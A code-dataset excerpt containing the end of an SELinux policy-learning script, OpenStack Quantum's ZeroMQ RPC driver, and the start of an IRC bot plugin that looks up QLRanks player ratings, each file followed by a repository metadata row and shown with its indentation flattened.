execve_keys = execves.keys()
for exe_path in sorted(execve_keys):
# Write all the interactions with this file
for call in execves[exe_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(exe_path), getFileCon(exe_path)))
fc_file.write("\n\n\n# **** Open ****\n")
open_keys = opens.keys()
for open_path in sorted(open_keys):
# Write all the interactions with this file
for call in opens[open_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(open_path), getFileCon(open_path)))
fc_file.write("\n\n\n# **** Standard libraries ****\n")
libs_keys = libs.keys()
for lib_path in sorted(libs_keys):
# Write all the interactions with this file
for call in libs[lib_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(lib_path), getFileCon(lib_path)))
fc_file.write("\n\n\n# **** SHM ****\n")
shms_keys = shms.keys()
for shm_path in sorted(shms_keys):
# Write all the interactions with this file
for call in shms[shm_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(shm_path), getFileCon(shm_path)))
# Delete all the created files
deleteFileList(to_be_deleted);
def parseFCFile(policy_fc):
# Read the fc policy
if not os.path.exists(policy_fc):
return set(), "The fc policy file %s doesn't exist\n" % policy_fc
fc_policy_file = open("%s" % policy_fc, "r")
# split the fc policy file
fc_policies = []
for line in fc_policy_file:
m = re.match(r"\s*(?P<comment>#)?(?P<path>\\?/\S+)\s+(?P<type>\S+)?\s+(?P<context>\S+)", line)
if m:
pol = dict()
pol['path'] = m.groupdict()['path']
pol['type'] = m.groupdict()['type']
pol['context'] = m.groupdict()['context']
pol['commented'] = m.groupdict()['comment']=="#"
if (pol['type'] == None):
pol['type'] = ''
#print("Found rule: comment = '%s' path='%s', type='%s', context='%s'" % (pol['commented'], pol['path'], pol['type'], pol['context']))
fc_policies.append(pol)
return fc_policies
def addFCContextsToTE(policy_fc, policy_te):
# Read the te policy
if not os.path.exists(policy_te):
return set(), "The te policy file %s doesn't exist\n" % policy_fc
te_policy_file = open("%s" % policy_te, "a")
fc_policies = parseFCFile(policy_fc)
for policy in fc_policies:
if not policy['commented']:
print("got context %s\n" % policy['context'])
te_policy_file.write("type %s;\nfiles_type(%s);\n" % (policy['context'], policy['context']))
te_policy_file.close()
def editFiles(filepathes):
editor_path = os.getenv('EDITOR')
if not editor_path:
print('The $EDITOR environement variable is not set.\nWhich editor would you like to use ?')
editor = input('')
os.environ['EDITOR'] = editor
params = [editor_path]
params.extend(filepathes)
proc = subprocess.Popen(params)
proc.communicate()
return proc.returncode == 0
def willingToQuit():
print("\nThe system is currently learning a SELinux security policy.")
print("Deciding to stop it now means you have successfully tested all the functionnalities of the software you are auditing.")
print("\nAre you sure you want to stop it ? (y/N)")
answer=input('')
if answer in ('y', 'Y', 'Yes', 'yes'):
return True
else:
return False
def startAuditing(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse):
# Re-route signals to the launched process
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
signal.signal(signal.SIGHUP, handler)
global wantToAbort
wantToAbort = False
if not reuse:
# Get a base policy and load it
print("Generate the base policy and load it")
base_policy=generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc)
if not compileAndLoadSELinuxModule(base_policy):
return False
else:
if not os.path.exists(getPolicyPath(module_name, "te")):
print("The module %s doesn't exist." % module_name)
return
# Create a policy for selpolgen.py so as when it launches the audited program, the audited program will transit to the right domain
print("Generate the sysadm policy to launch the application in the right context")
temp_policy=generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t)
if not compileAndLoadSELinuxModule(temp_policy):
return False
# Set the app context on the disc
print("Set the application file's new context")
setFileSELinuxContext("system_u", "object_r", module_exec_t, app_path)
# run the application
askToRunApp(app_path, user_t, audit_fc);
if audit_fc:
isRunning = True
while isRunning :
if wantToAbort:
if willingToQuit():
sys.exit(0)
else:
wantToAbort = False
time.sleep(0.1)
# remove the lock if the file exists
if os.path.exists("/tmp/selinux-audit/lock"):
isRunning = False
# Propose some file constraints
print("Update the fc file, this may take a while");
auditStraceLogs(module_name)
# Regenerate the policy
updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=True)
# let the application start again
os.remove("/tmp/selinux-audit/lock")
print("FC Labelling done\n")
print("Start the TE learning loop")
# learning loop
nbRulesAddedSinceLastExecution = 0
execStart = time.time()
zeroRuleLoopCount = 0
while True:
if wantToAbort:
if willingToQuit():
break
else:
wantToAbort = False
time.sleep(0.1)
nbRulesAddedSinceLastExecution += updateAndReloadRules(module_name, module_domain_t)
# remove the lock if the file exists
if os.path.exists("/tmp/selinux-audit/lock"):
if nbRulesAddedSinceLastExecution > 0:
auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=False)
zeroRuleLoopCount = 0
elif time.time()-execStart > 2.0 or zeroRuleLoopCount > 5:
print("\n**********\nNo rules have been added during the execution of this audit instance.")
print("Have you tested every use case allowed for the application ? (y/N)")
answer=input('')
print("**********")
if answer in ('y', 'Y', 'Yes', 'yes'):
break
zeroRuleLoopCount = 0
else:
zeroRuleLoopCount = zeroRuleLoopCount + 1
print("The instance didn't generate any rules but carry on nevertheless (%s/5)" % zeroRuleLoopCount)
nbRulesAddedSinceLastExecution = 0
execStart = time.time()
os.remove("/tmp/selinux-audit/lock");
print("\nThe final policy can be found at %s" % getPolicyPath(module_name, ""))
class Usage(Exception):
def __init__(self, msg):
Exception.__init__(self)
self.msg = msg
def show_help():
print("Help:\n")
print("-h or --help : This help message")
print("-m or --module : The name of the SELinux module you would like to create (mandatory)")
print("-u or --user_u : The SELinux user who will execute the application")
print("-r or --user_r : The SELinux role who will execute the application")
print("-t or --user_t : The SELinux type who will execute the application")
print("-d or --module_domain_t : The domain in which the audited application will be executed")
print("-e or --module_exec_t : The file label that will be given to the application")
print("-t or --module_tmp_domain_t : The file label that will be given to the application's tmp files")
print("-l or --module_log_domain_t : The file label that will be given to the application's log files")
print("-f or --no_fc_pass : Do not fill the fc file. Learning the policy will take one iteration less")
print("-p or --reuse_policy : Re-use a pre-existing policy and learn what's new")
def main(argv=None):
if argv is None:
argv = sys.argv
cwd = os.path.dirname(os.path.realpath(argv[0])) + '/'
os.chdir(cwd)
try:
# Check the given parameter names and get their values
try:
opts, args = getopt.getopt(argv[1:], "hvm:u:r:t:d:e:t:l:fp",
["help", "verbose", "module=", "user_u=", "user_r=", "user_t=", "module_domain_t=", "module_exec_t=", "module_tmp_domain_t=", "module_log_domain_t=", "no_fc_pass", "reuse_policy"])
except(getopt.error) as msg:
print("Argument parsing error: %s" % msg)
raise Usage(msg)
# Params
module_name = ''
module_domain_t = ''
module_exec_t = ''
module_tmp_domain_t = ''
module_log_domain_t = ''
audit_fc = True
app_fullpath = ''
user_u = user_u_default
user_r = user_r_default
user_t = user_t_default
reuse = False
# Get the parameters
for opt, arg in opts:
if opt in ("-h", "--help"):
show_help()
return 0
elif opt in ("-v", "--verbose"):
verbosity += 1
elif opt in ("-m", "--module"):
module_name = arg
elif opt in ("-u", "--user_u"):
user_u = arg
elif opt in ("-r", "--user_r"):
user_r = arg
elif opt in ("-t", "--user_t"):
user_t = arg
elif opt in ("-e", "--module_exec_t"):
module_exec_t = arg
elif opt in ("-d", "--module_domain_t"):
module_domain_t = arg
elif opt in ("-t", "--module_tmp_domain_t"):
module_tmp_domain_t = arg
elif opt in ("-l", "--module_log_domain_t"):
module_log_domain_t = arg
elif opt in ("-f", "--no_fc_pass"):
audit_fc = False
elif opt in ("-p", "--reuse_policy"):
reuse = True
# if there are no args left, then an error happened
if len(args) == 0 or module_name == '':
print('Usage: %s [options] -m module_name filepath' % sys.argv[0], file=sys.stderr)
else:
# Get the fullpath
app_fullpath = args[len(args)-1]
# Set the default value for module_domain_t & module_exec_t if there were not set by the user
if module_domain_t == '':
module_domain_t = module_domain_t_default_pattern.replace("%modulename%", module_name)
if module_exec_t == '':
module_exec_t = module_exec_t_default_pattern.replace("%modulename%", module_name)
if module_tmp_domain_t == '':
module_tmp_domain_t = module_tmp_domain_t_default_pattern.replace("%modulename%", module_name)
if module_log_domain_t == '':
module_log_domain_t = module_log_domain_t_default_pattern.replace("%modulename%", module_name)
# Let's recap to the user what he has chosen.
print('You are about to create a SELinux module for the application')
print('')
print('Here is the summary of how it will be created:')
print(' Module name (-m): %s' % module_name)
print(' Application path: \'%s\'' % app_fullpath)
print(' Will be labelled as ():():(-e):%s:%s:%s' % ('system_u', 'object_r', module_exec_t))
print(' Be executed by (-u):(-r):(-t): %s:%s:%s' % (user_u, user_r, user_t))
print(' Jailed in the domain (-d): %s' % module_domain_t)
print(' Tmp file\'s domain is (-t): %s' % module_tmp_domain_t)
print(' Log file\'s domain is (-l): %s' % module_log_domain_t)
print(' Do not audit the fc file (bad practice!) (-f): %s' % (not audit_fc))
print(' Re-use an existing policy (-p): %s' % (reuse))
print('')
print('Do you agree with that ? (Y/n)')
answer=input('')
if answer in ('', 'y', 'Y', 'Yes', 'yes'):
startAuditing(module_name, app_fullpath, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse)
else:
return 0
except(Usage) as err:
print('%s: %s' % (sys.argv[0], err.msg), file=sys.stderr)
print('For a list of available options, use "%s --help"'\
% sys.argv[0], file=sys.stderr)
return -1
if __name__ == '__main__':
main()
| gpl-3.0 | -7,108,910,309,036,765,000 | 32.52431 | 267 | 0.65428 | false | 2.978286 | false | false | false |
rossella/neutron | quantum/openstack/common/rpc/impl_zmq.py | 1 | 25519 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Cloudscaling Group, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import pprint
import socket
import string
import sys
import types
import uuid
import eventlet
import greenlet
from quantum.openstack.common import cfg
from quantum.openstack.common.gettextutils import _
from quantum.openstack.common import importutils
from quantum.openstack.common import jsonutils
from quantum.openstack.common import processutils as utils
from quantum.openstack.common.rpc import common as rpc_common
zmq = importutils.try_import('eventlet.green.zmq')
# for convenience, are not modified.
pformat = pprint.pformat
Timeout = eventlet.timeout.Timeout
LOG = rpc_common.LOG
RemoteError = rpc_common.RemoteError
RPCException = rpc_common.RPCException
zmq_opts = [
cfg.StrOpt('rpc_zmq_bind_address', default='*',
help='ZeroMQ bind address. Should be a wildcard (*), '
'an ethernet interface, or IP. '
'The "host" option should point or resolve to this '
'address.'),
# The module.Class to use for matchmaking.
cfg.StrOpt(
'rpc_zmq_matchmaker',
default=('quantum.openstack.common.rpc.'
'matchmaker.MatchMakerLocalhost'),
help='MatchMaker driver',
),
# The following port is unassigned by IANA as of 2012-05-21
cfg.IntOpt('rpc_zmq_port', default=9501,
help='ZeroMQ receiver listening port'),
cfg.IntOpt('rpc_zmq_contexts', default=1,
help='Number of ZeroMQ contexts, defaults to 1'),
cfg.IntOpt('rpc_zmq_topic_backlog', default=None,
help='Maximum number of ingress messages to locally buffer '
'per topic. Default is unlimited.'),
cfg.StrOpt('rpc_zmq_ipc_dir', default='/var/run/openstack',
help='Directory for holding IPC sockets'),
cfg.StrOpt('rpc_zmq_host', default=socket.gethostname(),
help='Name of this node. Must be a valid hostname, FQDN, or '
'IP address. Must match "host" option, if running Nova.')
]
CONF = cfg.CONF
CONF.register_opts(zmq_opts)
ZMQ_CTX = None # ZeroMQ Context, must be global.
matchmaker = None # memoized matchmaker object
def _serialize(data):
"""
Serialization wrapper
We prefer using JSON, but it cannot encode all types.
Error if a developer passes us bad data.
"""
try:
return str(jsonutils.dumps(data, ensure_ascii=True))
except TypeError:
LOG.error(_("JSON serialization failed."))
raise
def _deserialize(data):
"""
Deserialization wrapper
"""
LOG.debug(_("Deserializing: %s"), data)
return jsonutils.loads(data)
class ZmqSocket(object):
"""
A tiny wrapper around ZeroMQ to simplify the send/recv protocol
and connection management.
Can be used as a Context (supports the 'with' statement).
"""
def __init__(self, addr, zmq_type, bind=True, subscribe=None):
self.sock = _get_ctxt().socket(zmq_type)
self.addr = addr
self.type = zmq_type
self.subscriptions = []
# Support failures on sending/receiving on wrong socket type.
self.can_recv = zmq_type in (zmq.PULL, zmq.SUB)
self.can_send = zmq_type in (zmq.PUSH, zmq.PUB)
self.can_sub = zmq_type in (zmq.SUB, )
# Support list, str, & None for subscribe arg (cast to list)
do_sub = {
list: subscribe,
str: [subscribe],
type(None): []
}[type(subscribe)]
for f in do_sub:
self.subscribe(f)
str_data = {'addr': addr, 'type': self.socket_s(),
'subscribe': subscribe, 'bind': bind}
LOG.debug(_("Connecting to %(addr)s with %(type)s"), str_data)
LOG.debug(_("-> Subscribed to %(subscribe)s"), str_data)
LOG.debug(_("-> bind: %(bind)s"), str_data)
try:
if bind:
self.sock.bind(addr)
else:
self.sock.connect(addr)
except Exception:
raise RPCException(_("Could not open socket."))
def socket_s(self):
"""Get socket type as string."""
t_enum = ('PUSH', 'PULL', 'PUB', 'SUB', 'REP', 'REQ', 'ROUTER',
'DEALER')
return dict(map(lambda t: (getattr(zmq, t), t), t_enum))[self.type]
def subscribe(self, msg_filter):
"""Subscribe."""
if not self.can_sub:
raise RPCException("Cannot subscribe on this socket.")
LOG.debug(_("Subscribing to %s"), msg_filter)
try:
self.sock.setsockopt(zmq.SUBSCRIBE, msg_filter)
except Exception:
return
self.subscriptions.append(msg_filter)
def unsubscribe(self, msg_filter):
"""Unsubscribe."""
if msg_filter not in self.subscriptions:
return
self.sock.setsockopt(zmq.UNSUBSCRIBE, msg_filter)
self.subscriptions.remove(msg_filter)
def close(self):
if self.sock is None or self.sock.closed:
return
# We must unsubscribe, or we'll leak descriptors.
if len(self.subscriptions) > 0:
for f in self.subscriptions:
try:
self.sock.setsockopt(zmq.UNSUBSCRIBE, f)
except Exception:
pass
self.subscriptions = []
try:
# Default is to linger
self.sock.close()
except Exception:
# While this is a bad thing to happen,
# it would be much worse if some of the code calling this
# were to fail. For now, lets log, and later evaluate
# if we can safely raise here.
LOG.error("ZeroMQ socket could not be closed.")
self.sock = None
def recv(self):
if not self.can_recv:
raise RPCException(_("You cannot recv on this socket."))
return self.sock.recv_multipart()
def send(self, data):
if not self.can_send:
raise RPCException(_("You cannot send on this socket."))
self.sock.send_multipart(data)
class ZmqClient(object):
"""Client for ZMQ sockets."""
def __init__(self, addr, socket_type=None, bind=False):
if socket_type is None:
socket_type = zmq.PUSH
self.outq = ZmqSocket(addr, socket_type, bind=bind)
def cast(self, msg_id, topic, data, serialize=True, force_envelope=False):
if serialize:
data = rpc_common.serialize_msg(data, force_envelope)
self.outq.send([str(msg_id), str(topic), str('cast'),
_serialize(data)])
def close(self):
self.outq.close()
class RpcContext(rpc_common.CommonRpcContext):
"""Context that supports replying to a rpc.call."""
def __init__(self, **kwargs):
self.replies = []
super(RpcContext, self).__init__(**kwargs)
def deepcopy(self):
values = self.to_dict()
values['replies'] = self.replies
return self.__class__(**values)
def reply(self, reply=None, failure=None, ending=False):
if ending:
return
self.replies.append(reply)
@classmethod
def marshal(self, ctx):
ctx_data = ctx.to_dict()
return _serialize(ctx_data)
@classmethod
def unmarshal(self, data):
return RpcContext.from_dict(_deserialize(data))
class InternalContext(object):
"""Used by ConsumerBase as a private context for - methods."""
def __init__(self, proxy):
self.proxy = proxy
self.msg_waiter = None
def _get_response(self, ctx, proxy, topic, data):
"""Process a curried message and cast the result to topic."""
LOG.debug(_("Running func with context: %s"), ctx.to_dict())
data.setdefault('version', None)
data.setdefault('args', {})
try:
result = proxy.dispatch(
ctx, data['version'], data['method'], **data['args'])
return ConsumerBase.normalize_reply(result, ctx.replies)
except greenlet.GreenletExit:
# ignore these since they are just from shutdowns
pass
except rpc_common.ClientException, e:
LOG.debug(_("Expected exception during message handling (%s)") %
e._exc_info[1])
return {'exc':
rpc_common.serialize_remote_exception(e._exc_info,
log_failure=False)}
except Exception:
LOG.error(_("Exception during message handling"))
return {'exc':
rpc_common.serialize_remote_exception(sys.exc_info())}
def reply(self, ctx, proxy,
msg_id=None, context=None, topic=None, msg=None):
"""Reply to a casted call."""
# Our real method is curried into msg['args']
child_ctx = RpcContext.unmarshal(msg[0])
response = ConsumerBase.normalize_reply(
self._get_response(child_ctx, proxy, topic, msg[1]),
ctx.replies)
LOG.debug(_("Sending reply"))
cast(CONF, ctx, topic, {
'method': '-process_reply',
'args': {
'msg_id': msg_id,
'response': response
}
})
class ConsumerBase(object):
"""Base Consumer."""
def __init__(self):
self.private_ctx = InternalContext(None)
@classmethod
def normalize_reply(self, result, replies):
#TODO(ewindisch): re-evaluate and document this method.
if isinstance(result, types.GeneratorType):
return list(result)
elif replies:
return replies
else:
return [result]
def process(self, style, target, proxy, ctx, data):
# Method starting with - are
# processed internally. (non-valid method name)
method = data['method']
# Internal method
# uses internal context for safety.
if data['method'][0] == '-':
# For reply / process_reply
method = method[1:]
if method == 'reply':
self.private_ctx.reply(ctx, proxy, **data['args'])
return
data.setdefault('version', None)
data.setdefault('args', {})
proxy.dispatch(ctx, data['version'],
data['method'], **data['args'])
class ZmqBaseReactor(ConsumerBase):
"""
A consumer class implementing a
centralized casting broker (PULL-PUSH)
for RoundRobin requests.
"""
def __init__(self, conf):
super(ZmqBaseReactor, self).__init__()
self.mapping = {}
self.proxies = {}
self.threads = []
self.sockets = []
self.subscribe = {}
self.pool = eventlet.greenpool.GreenPool(conf.rpc_thread_pool_size)
def register(self, proxy, in_addr, zmq_type_in, out_addr=None,
zmq_type_out=None, in_bind=True, out_bind=True,
subscribe=None):
LOG.info(_("Registering reactor"))
if zmq_type_in not in (zmq.PULL, zmq.SUB):
raise RPCException("Bad input socktype")
# Items push in.
inq = ZmqSocket(in_addr, zmq_type_in, bind=in_bind,
subscribe=subscribe)
self.proxies[inq] = proxy
self.sockets.append(inq)
LOG.info(_("In reactor registered"))
if not out_addr:
return
if zmq_type_out not in (zmq.PUSH, zmq.PUB):
raise RPCException("Bad output socktype")
# Items push out.
outq = ZmqSocket(out_addr, zmq_type_out, bind=out_bind)
self.mapping[inq] = outq
self.mapping[outq] = inq
self.sockets.append(outq)
LOG.info(_("Out reactor registered"))
def consume_in_thread(self):
def _consume(sock):
LOG.info(_("Consuming socket"))
while True:
self.consume(sock)
for k in self.proxies.keys():
self.threads.append(
self.pool.spawn(_consume, k)
)
def wait(self):
for t in self.threads:
t.wait()
def close(self):
for s in self.sockets:
s.close()
for t in self.threads:
t.kill()
class ZmqProxy(ZmqBaseReactor):
"""
A consumer class implementing a
topic-based proxy, forwarding to
IPC sockets.
"""
def __init__(self, conf):
super(ZmqProxy, self).__init__(conf)
self.topic_proxy = {}
def consume(self, sock):
ipc_dir = CONF.rpc_zmq_ipc_dir
#TODO(ewindisch): use zero-copy (i.e. references, not copying)
data = sock.recv()
msg_id, topic, style, in_msg = data
topic = topic.split('.', 1)[0]
LOG.debug(_("CONSUMER GOT %s"), ' '.join(map(pformat, data)))
# Handle zmq_replies magic
if topic.startswith('fanout~'):
sock_type = zmq.PUB
elif topic.startswith('zmq_replies'):
sock_type = zmq.PUB
inside = rpc_common.deserialize_msg(_deserialize(in_msg))
msg_id = inside[-1]['args']['msg_id']
response = inside[-1]['args']['response']
LOG.debug(_("->response->%s"), response)
data = [str(msg_id), _serialize(response)]
else:
sock_type = zmq.PUSH
if not topic in self.topic_proxy:
def publisher(waiter):
LOG.info(_("Creating proxy for topic: %s"), topic)
try:
out_sock = ZmqSocket("ipc://%s/zmq_topic_%s" %
(ipc_dir, topic),
sock_type, bind=True)
except RPCException:
waiter.send_exception(*sys.exc_info())
return
self.topic_proxy[topic] = eventlet.queue.LightQueue(
CONF.rpc_zmq_topic_backlog)
self.sockets.append(out_sock)
# It takes some time for a pub socket to open,
# before we can have any faith in doing a send() to it.
if sock_type == zmq.PUB:
eventlet.sleep(.5)
waiter.send(True)
while(True):
data = self.topic_proxy[topic].get()
out_sock.send(data)
LOG.debug(_("ROUTER RELAY-OUT SUCCEEDED %(data)s") %
{'data': data})
wait_sock_creation = eventlet.event.Event()
eventlet.spawn(publisher, wait_sock_creation)
try:
wait_sock_creation.wait()
except RPCException:
LOG.error(_("Topic socket file creation failed."))
return
try:
self.topic_proxy[topic].put_nowait(data)
LOG.debug(_("ROUTER RELAY-OUT QUEUED %(data)s") %
{'data': data})
except eventlet.queue.Full:
LOG.error(_("Local per-topic backlog buffer full for topic "
"%(topic)s. Dropping message.") % {'topic': topic})
def consume_in_thread(self):
"""Runs the ZmqProxy service"""
ipc_dir = CONF.rpc_zmq_ipc_dir
consume_in = "tcp://%s:%s" % \
(CONF.rpc_zmq_bind_address,
CONF.rpc_zmq_port)
consumption_proxy = InternalContext(None)
if not os.path.isdir(ipc_dir):
try:
utils.execute('mkdir', '-p', ipc_dir, run_as_root=True)
utils.execute('chown', "%s:%s" % (os.getuid(), os.getgid()),
ipc_dir, run_as_root=True)
utils.execute('chmod', '750', ipc_dir, run_as_root=True)
except utils.ProcessExecutionError:
LOG.error(_("Could not create IPC directory %s") %
(ipc_dir, ))
raise
try:
self.register(consumption_proxy,
consume_in,
zmq.PULL,
out_bind=True)
except zmq.ZMQError:
LOG.error(_("Could not create ZeroMQ receiver daemon. "
"Socket may already be in use."))
raise
super(ZmqProxy, self).consume_in_thread()
class ZmqReactor(ZmqBaseReactor):
"""
A consumer class implementing a
consumer for messages. Can also be
used as a 1:1 proxy
"""
def __init__(self, conf):
super(ZmqReactor, self).__init__(conf)
def consume(self, sock):
#TODO(ewindisch): use zero-copy (i.e. references, not copying)
data = sock.recv()
LOG.debug(_("CONSUMER RECEIVED DATA: %s"), data)
if sock in self.mapping:
LOG.debug(_("ROUTER RELAY-OUT %(data)s") % {
'data': data})
self.mapping[sock].send(data)
return
msg_id, topic, style, in_msg = data
ctx, request = rpc_common.deserialize_msg(_deserialize(in_msg))
ctx = RpcContext.unmarshal(ctx)
proxy = self.proxies[sock]
self.pool.spawn_n(self.process, style, topic,
proxy, ctx, request)
class Connection(rpc_common.Connection):
"""Manages connections and threads."""
def __init__(self, conf):
self.reactor = ZmqReactor(conf)
def create_consumer(self, topic, proxy, fanout=False):
# Only consume on the base topic name.
topic = topic.split('.', 1)[0]
LOG.info(_("Create Consumer for topic (%(topic)s)") %
{'topic': topic})
# Subscription scenarios
if fanout:
subscribe = ('', fanout)[type(fanout) == str]
sock_type = zmq.SUB
topic = 'fanout~' + topic
else:
sock_type = zmq.PULL
subscribe = None
# Receive messages from (local) proxy
inaddr = "ipc://%s/zmq_topic_%s" % \
(CONF.rpc_zmq_ipc_dir, topic)
LOG.debug(_("Consumer is a zmq.%s"),
['PULL', 'SUB'][sock_type == zmq.SUB])
self.reactor.register(proxy, inaddr, sock_type,
subscribe=subscribe, in_bind=False)
def close(self):
self.reactor.close()
def wait(self):
self.reactor.wait()
def consume_in_thread(self):
self.reactor.consume_in_thread()
def _cast(addr, context, msg_id, topic, msg, timeout=None, serialize=True,
force_envelope=False):
timeout_cast = timeout or CONF.rpc_cast_timeout
payload = [RpcContext.marshal(context), msg]
with Timeout(timeout_cast, exception=rpc_common.Timeout):
try:
conn = ZmqClient(addr)
# assumes cast can't return an exception
conn.cast(msg_id, topic, payload, serialize, force_envelope)
except zmq.ZMQError:
raise RPCException("Cast failed. ZMQ Socket Exception")
finally:
if 'conn' in vars():
conn.close()
def _call(addr, context, msg_id, topic, msg, timeout=None,
serialize=True, force_envelope=False):
# timeout_response is how long we wait for a response
timeout = timeout or CONF.rpc_response_timeout
# The msg_id is used to track replies.
msg_id = uuid.uuid4().hex
# Replies always come into the reply service.
reply_topic = "zmq_replies.%s" % CONF.rpc_zmq_host
LOG.debug(_("Creating payload"))
# Curry the original request into a reply method.
mcontext = RpcContext.marshal(context)
payload = {
'method': '-reply',
'args': {
'msg_id': msg_id,
'context': mcontext,
'topic': reply_topic,
'msg': [mcontext, msg]
}
}
LOG.debug(_("Creating queue socket for reply waiter"))
# Messages arriving async.
# TODO(ewindisch): have reply consumer with dynamic subscription mgmt
with Timeout(timeout, exception=rpc_common.Timeout):
try:
msg_waiter = ZmqSocket(
"ipc://%s/zmq_topic_zmq_replies" % CONF.rpc_zmq_ipc_dir,
zmq.SUB, subscribe=msg_id, bind=False
)
LOG.debug(_("Sending cast"))
_cast(addr, context, msg_id, topic, payload,
serialize=serialize, force_envelope=force_envelope)
LOG.debug(_("Cast sent; Waiting reply"))
# Blocks until receives reply
msg = msg_waiter.recv()
LOG.debug(_("Received message: %s"), msg)
LOG.debug(_("Unpacking response"))
responses = _deserialize(msg[-1])
# ZMQError trumps the Timeout error.
except zmq.ZMQError:
raise RPCException("ZMQ Socket Error")
finally:
if 'msg_waiter' in vars():
msg_waiter.close()
# It seems we don't need to do all of the following,
# but perhaps it would be useful for multicall?
# One effect of this is that we're checking all
# responses for Exceptions.
for resp in responses:
if isinstance(resp, types.DictType) and 'exc' in resp:
raise rpc_common.deserialize_remote_exception(CONF, resp['exc'])
return responses[-1]
def _multi_send(method, context, topic, msg, timeout=None, serialize=True,
force_envelope=False):
"""
Wraps the sending of messages,
dispatches to the matchmaker and sends
message to all relevant hosts.
"""
conf = CONF
LOG.debug(_("%(msg)s") % {'msg': ' '.join(map(pformat, (topic, msg)))})
queues = _get_matchmaker().queues(topic)
LOG.debug(_("Sending message(s) to: %s"), queues)
# Don't stack if we have no matchmaker results
if len(queues) == 0:
LOG.warn(_("No matchmaker results. Not casting."))
# While not strictly a timeout, callers know how to handle
# this exception and a timeout isn't too big a lie.
raise rpc_common.Timeout, "No match from matchmaker."
# This supports brokerless fanout (addresses > 1)
for queue in queues:
(_topic, ip_addr) = queue
_addr = "tcp://%s:%s" % (ip_addr, conf.rpc_zmq_port)
if method.__name__ == '_cast':
eventlet.spawn_n(method, _addr, context,
_topic, _topic, msg, timeout, serialize,
force_envelope)
return
return method(_addr, context, _topic, _topic, msg, timeout,
serialize, force_envelope)
def create_connection(conf, new=True):
return Connection(conf)
def multicall(conf, *args, **kwargs):
"""Multiple calls."""
return _multi_send(_call, *args, **kwargs)
def call(conf, *args, **kwargs):
"""Send a message, expect a response."""
data = _multi_send(_call, *args, **kwargs)
return data[-1]
def cast(conf, *args, **kwargs):
"""Send a message expecting no reply."""
_multi_send(_cast, *args, **kwargs)
def fanout_cast(conf, context, topic, msg, **kwargs):
"""Send a message to all listening and expect no reply."""
# NOTE(ewindisch): fanout~ is used because it avoid splitting on .
# and acts as a non-subtle hint to the matchmaker and ZmqProxy.
_multi_send(_cast, context, 'fanout~' + str(topic), msg, **kwargs)
def notify(conf, context, topic, msg, **kwargs):
"""
Send notification event.
Notifications are sent to topic-priority.
This differs from the AMQP drivers which send to topic.priority.
"""
# NOTE(ewindisch): dot-priority in rpc notifier does not
# work with our assumptions.
topic.replace('.', '-')
kwargs['serialize'] = kwargs.pop('envelope')
kwargs['force_envelope'] = True
cast(conf, context, topic, msg, **kwargs)
def cleanup():
"""Clean up resources in use by implementation."""
global ZMQ_CTX
if ZMQ_CTX:
ZMQ_CTX.term()
ZMQ_CTX = None
global matchmaker
matchmaker = None
def _get_ctxt():
if not zmq:
raise ImportError("Failed to import eventlet.green.zmq")
global ZMQ_CTX
if not ZMQ_CTX:
ZMQ_CTX = zmq.Context(CONF.rpc_zmq_contexts)
return ZMQ_CTX
def _get_matchmaker():
global matchmaker
if not matchmaker:
# rpc_zmq_matchmaker should be set to a 'module.Class'
mm_path = CONF.rpc_zmq_matchmaker.split('.')
mm_module = '.'.join(mm_path[:-1])
mm_class = mm_path[-1]
# Only initialize a class.
if mm_path[-1][0] not in string.ascii_uppercase:
LOG.error(_("Matchmaker could not be loaded.\n"
"rpc_zmq_matchmaker is not a class."))
raise RPCException(_("Error loading Matchmaker."))
mm_impl = importutils.import_module(mm_module)
mm_constructor = getattr(mm_impl, mm_class)
matchmaker = mm_constructor()
return matchmaker
| apache-2.0 | -8,324,594,890,385,945,000 | 31.018821 | 78 | 0.568361 | false | 4.02064 | false | false | false |
anlutro/botologist | plugins/qlranks.py | 1 | 2116 | import logging
log = logging.getLogger(__name__)
import requests
import requests.exceptions
import botologist.plugin
def _get_qlr_data(nick):
url = "http://www.qlranks.com/api.aspx"
response = requests.get(url, {"nick": nick}, timeout=4)
return response.json()["players"][0]
def _get_qlr_elo(nick, modes=None):
"""
Get someone's QLRanks ELO.
nick should be a valid Quake Live nickname. modes should be an iterable
(list, tuple) of game-modes to display ELO for (duel, ctf, tdm...)
"""
if modes is None:
modes = ("duel",)
try:
data = _get_qlr_data(nick)
except requests.exceptions.RequestException:
log.warning("QLRanks request caused an exception", exc_info=True)
return "HTTP error, try again!"
# qlranks returns rank 0 indicating a player has no rating - if all modes
# have rank 0, it is safe to assume the player does not exist
unranked = [mode["rank"] == 0 for mode in data.values() if isinstance(mode, dict)]
if all(unranked):
return "Player not found or no games played: " + data.get("nick", "unknown")
retval = data["nick"]
# convert to set to prevent duplicates
for mode in set(modes):
if mode not in data:
return "Unknown mode: " + mode
if data[mode]["rank"] == 0:
retval += " - {mode}: unranked".format(mode=mode)
else:
retval += " - {mode}: {elo} (rank {rank:,})".format(
mode=mode, elo=data[mode]["elo"], rank=data[mode]["rank"]
)
return retval
class QlranksPlugin(botologist.plugin.Plugin):
"""QLRanks plugin."""
